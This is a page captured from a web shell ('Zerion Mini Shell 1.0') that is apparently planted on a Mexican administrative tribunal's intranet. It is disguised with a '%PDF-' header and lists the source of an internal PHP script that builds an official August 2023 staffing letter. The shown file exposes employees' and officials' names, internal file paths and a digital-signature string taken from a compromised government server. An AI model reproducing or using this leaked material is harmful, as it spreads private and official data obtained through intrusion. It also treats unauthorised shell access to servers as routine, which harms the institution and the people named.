%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/intranet.tjamich.gob.mx/intranet/sistemas/recursoshumanos/
Upload File :
Create Path :
Current File : /home/tjamichg/intranet.tjamich.gob.mx/intranet/sistemas/recursoshumanos/pdfdocestatico2.php

<?php

// omitido fpdi

// // include('config.php');

// use setasign\Fpdi\Fpdi;



require_once('./flowing_blockv5.php');

// omitido fpdi

// require_once('./fpdi/src/autoload.php');





// $url_pdf      = $_REQUEST["periodico"];



// $consultax = "SELECT *

// FROM usuario_municipio

// WHERE municipio_id = '1'";

// $rst1x = $conf->consulta($consultax);

// $rst1xnombre_formal = $rst1x[0]['nombre_formal'];



// omitido fpdi

// $pdf = new FPDI();

$pdf = new PDF_FlowingBlock();



$pdf->AddPage();



// FOTOGRAFIA

$pdf->Image('memebretadotest2.png', '10', '10', '30', '30', 'PNG');

$pdf->Image('memebretadotest.png', '170', '10', '30', '30', 'PNG');

$pdf->SetTextColor(25,25,25);

$pdf->SetFillColor(255,56,56);



// Cabecera

$pdf->SetFont('helvetica', 'B', 12);

$pdf->WriteHTML('<br><br><br><br><br><br>');

// $pdf->WriteHTML('<br>');

// $pdf->Cell(190, 5, utf8_decode('TRIBUNAL DE JUSTICIA ADMINISTRATIVA'), 0, 1, 'C', 0);

// $pdf->Cell(190, 5, utf8_decode('DEL ESTADO DE MICHOACÁN DE OCAMPO'), 0, 1, 'C', 0);

// $pdf->WriteHTML('<br>');

// $pdf->SetFont('helvetica', '', 12);

// $pdf->Cell(190, 5, utf8_decode('PRESIDENCIA'), 0, 1, 'C', 0);

// $pdf->WriteHTML('<br>');



// FECHA Y FOLIO

$pdf->SetFont('helvetica', '', 11);

$pdf->Cell(190, 5, utf8_decode('CUARTA SALA ESPECIALIZADA EN'), 0, 1, 'R', 0);

$pdf->Cell(190, 5, utf8_decode('MATERIA DE ANTICORRUPCIÓN Y'), 0, 1, 'R', 0);

$pdf->Cell(190, 5, utf8_decode('RESPONSABILIDADS ADMINISTRATIVAS'), 0, 1, 'R', 0);

$pdf->WriteHTML('<br>');



$pdf->Cell(190, 5, utf8_decode('OFICIO: IVSE/761/08/2023'.$xxxxx.''), 0, 1, 'R', 0);

$pdf->Cell(190, 5, utf8_decode('ASUNTO: El que se indica.'.$xxxxx.''), 0, 1, 'R', 0);

$pdf->SetFont('helvetica', '', 9);

$pdf->Cell(190, 10, utf8_decode('Morelia, Michoacán, 01 primero'.$xxxxx.' de agosto'.$xxxxx.' del 2023'.$xxxxx.' dos mil veintirés'.$xxxxx.'.'), 0, 1, 'R', 0);

$pdf->WriteHTML('<br>');





$pdf->SetFont('helvetica', 'B', 12);

$pdf->Cell(190, 5, utf8_decode('MTRO. LOGAN GUSTAVO MEZA HERRERA'), 0, 1, 'L', 0);

$pdf->Cell(190, 5, utf8_decode('SECRETARIO ADMINISTRATIVO DEL TRIBUNAL'), 0, 1, 'L', 0);

$pdf->Cell(190, 5, utf8_decode('DE JUSTICIA ADMINISTRATIVA'), 0, 1, 'L', 0);

$pdf->Cell(190, 5, utf8_decode('DEL ESTADO DE MICHOACÁN'), 0, 1, 'L', 0);

$pdf->Cell(190, 5, utf8_decode('P R E S E N T E'), 0, 1, 'L', 0);

$pdf->WriteHTML('<br>');





// PARRAFO

$pdf->newFlowingBlock(185, 6, 'J');

$pdf->SetFont('helvetica', '', 12);

$pdf->WriteFlowingBlock(utf8_decode('Por este medio del presente, le solicito de ser procedente se realicen los trámites administrativos correspondientes a efecto de que se lleve a cabo la contratación y habilitación de las siguientes personas, como se indica a continuación:'));

$pdf->finishFlowingBlock();

$pdf->WriteHTML('<br>');





// TABLA

$pdf->SetFont('helvetica', 'B', 10);

$pdf->Cell(40, 10, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(44, 10, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(40, 10, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(64, 10, utf8_decode(''), 1, 1, 'C', 0);

$pdf->Ln(-10);

$pdf->Cell(40, 5, utf8_decode('NOMBRE'), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode('CARGO'), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode('AREA DE'), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode('PERIODO'), 0, 1, 'C', 0);

$pdf->Cell(40, 5, utf8_decode(''), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode(''), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode('ADSCRIPCIÓN'), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode(''), 0, 1, 'C', 0);



// for ($i=0; $i < 5; $i++) { 

//     $pdf->Cell(40, 15, utf8_decode(''), 1, 0, 'C', 0);

//     $pdf->Cell(44, 15, utf8_decode(''), 1, 0, 'C', 0);

//     $pdf->Cell(40, 15, utf8_decode(''), 1, 0, 'C', 0);

//     $pdf->Cell(64, 15, utf8_decode(''), 1, 1, 'C', 0);

// }

$pdf->SetFont('helvetica', '', 8);

$pdf->Cell(40, 15, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(44, 15, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(40, 15, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(64, 15, utf8_decode(''), 1, 1, 'C', 0);

$pdf->Ln(-15);

$pdf->Cell(40, 5, utf8_decode('MARIA TERESA'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode('ESCRIBENTE HABILITADA'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode('CUARTA SALA'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode('PROVISIONALMENTE PARA'), 0, 1, 'C', 0);

$pdf->Cell(40, 5, utf8_decode('OJEDA GARDUÑO'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode('COMO PROYECTISTA B'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode('ESPECIALIZADA'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode('CUBRIR L CARGO DE KARLA'), 0, 1, 'C', 0);

$pdf->Cell(40, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode('JAZMIN GOMEZ TELLEZ'.$xxxxx.''), 0, 1, 'C', 0);



$pdf->Cell(40, 20, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(44, 20, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(40, 20, utf8_decode(''), 1, 0, 'C', 0);

$pdf->Cell(64, 20, utf8_decode(''), 1, 1, 'C', 0);

$pdf->Ln(-20);

$pdf->Cell(40, 5, utf8_decode('MARIA FERNANDA'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode('ESCRIBENTE'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode('CUARTA SALA'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode('PROVICIONALMENTE PARA CUBRIR EL'.$xxxxx.''), 0, 1, 'C', 0);

$pdf->Cell(40, 5, utf8_decode('CORTEZ PIMENTEL'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode('ESPECIALIZADA'.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode('CARGO DE MARIA TERESA OJEDA GARDUÑO'.$xxxxx.''), 0, 1, 'C', 0);

$pdf->Cell(40, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode('DEL 01 DE AGOSTO AL 31 DE DICIEMBRE'.$xxxxx.''), 0, 1, 'C', 0);

$pdf->Cell(40, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(44, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(40, 5, utf8_decode(''.$xxxxx.''), 0, 0, 'C', 0);

$pdf->Cell(64, 5, utf8_decode('DEL 2023'.$xxxxx.''), 0, 1, 'C', 0);



$pdf->WriteHTML('<br>');





// PARRAFO

$pdf->newFlowingBlock(185, 6, 'J');

$pdf->SetFont('helvetica', '', 12);

$pdf->WriteFlowingBlock(utf8_decode('Sin más por el momento, reciba un cordial saludo.'));

$pdf->finishFlowingBlock();

$pdf->WriteHTML('<br>');





// FIRMA

$pdf->SetFont('helvetica', 'B', 12);

$pdf->Cell(190, 5, utf8_decode('A T E N T A M E N T E'), 0, 1, 'C', 0);



$pdf->SetFont('helvetica', 'B', 11);

$pdf->Cell(190, 5, utf8_decode('Firma digital :'), 0, 1, 'L', 0);

$pdf->SetFont('helvetica', '', 11);

$pdf->MultiCell(190, 5, utf8_decode(''.$xxxxx.'VaHHwVWRgofwMiztosbY7dlC4H+/HD7AJq39klCpiUoGEKE2f9DBKgIfifrFlV1YcQEjNVnWHX6Asadi7+OMAawTy/1+1aOScKTLV214HplFatS5QVSz9Yyv3bPuqC+KDe+fl7pUvfgkfN53EYpisHM9Y4jngP1i3ULvyqVE+1OW6hT7kLJEANshOAKAwtGC40Ejo2t'), 0, 'L', 0);

$pdf->WriteHTML('<br>');



$pdf->SetFont('helvetica', 'B', 12);

$pdf->Cell(190, 5, utf8_decode('LICENCIADO HUGO ALBERTO GAMA CORIA'), 0, 1, 'C', 0);

$pdf->Cell(190, 5, utf8_decode('MAGISTRADO DE LA CUARTA SALA ESPECIALIZADA EN MATERIA DE'), 0, 1, 'C', 0);

$pdf->Cell(190, 5, utf8_decode('ANTICORRUPCIÓN Y RESPONSABILIDADES ADMINISTRATIVAS'), 0, 1, 'C', 0);

$pdf->WriteHTML('<br>');





// PIE

$pdf->SetFont('helvetica', '', 8);

$pdf->Cell(190, 3, utf8_decode('C.c.p. Presidencia del Tribunal de Justicia Administrativa del Estado.'), 0, 1, 'L', 0);

$pdf->Cell(190, 3, utf8_decode('C.c.p. L.A. María Fernanda Herrejón Orozco'.$xxxxx.', Coordinadora'.$xxxxx.' de Recursos Humanos, Tribunal de Justicia Administrativa del Estado.'), 0, 1, 'L', 0);

$pdf->Cell(190, 3, utf8_decode('C.c.p. Minutario.'), 0, 1, 'L', 0);



$pdf->SetFont('helvetica', 'B', 12);

$pdf->Cell(190, 5, utf8_decode('___________________________________________________________________________'), 0, 1, 'C', 0);





$pdf->Output();



?>

Zerion Mini Shell 1.0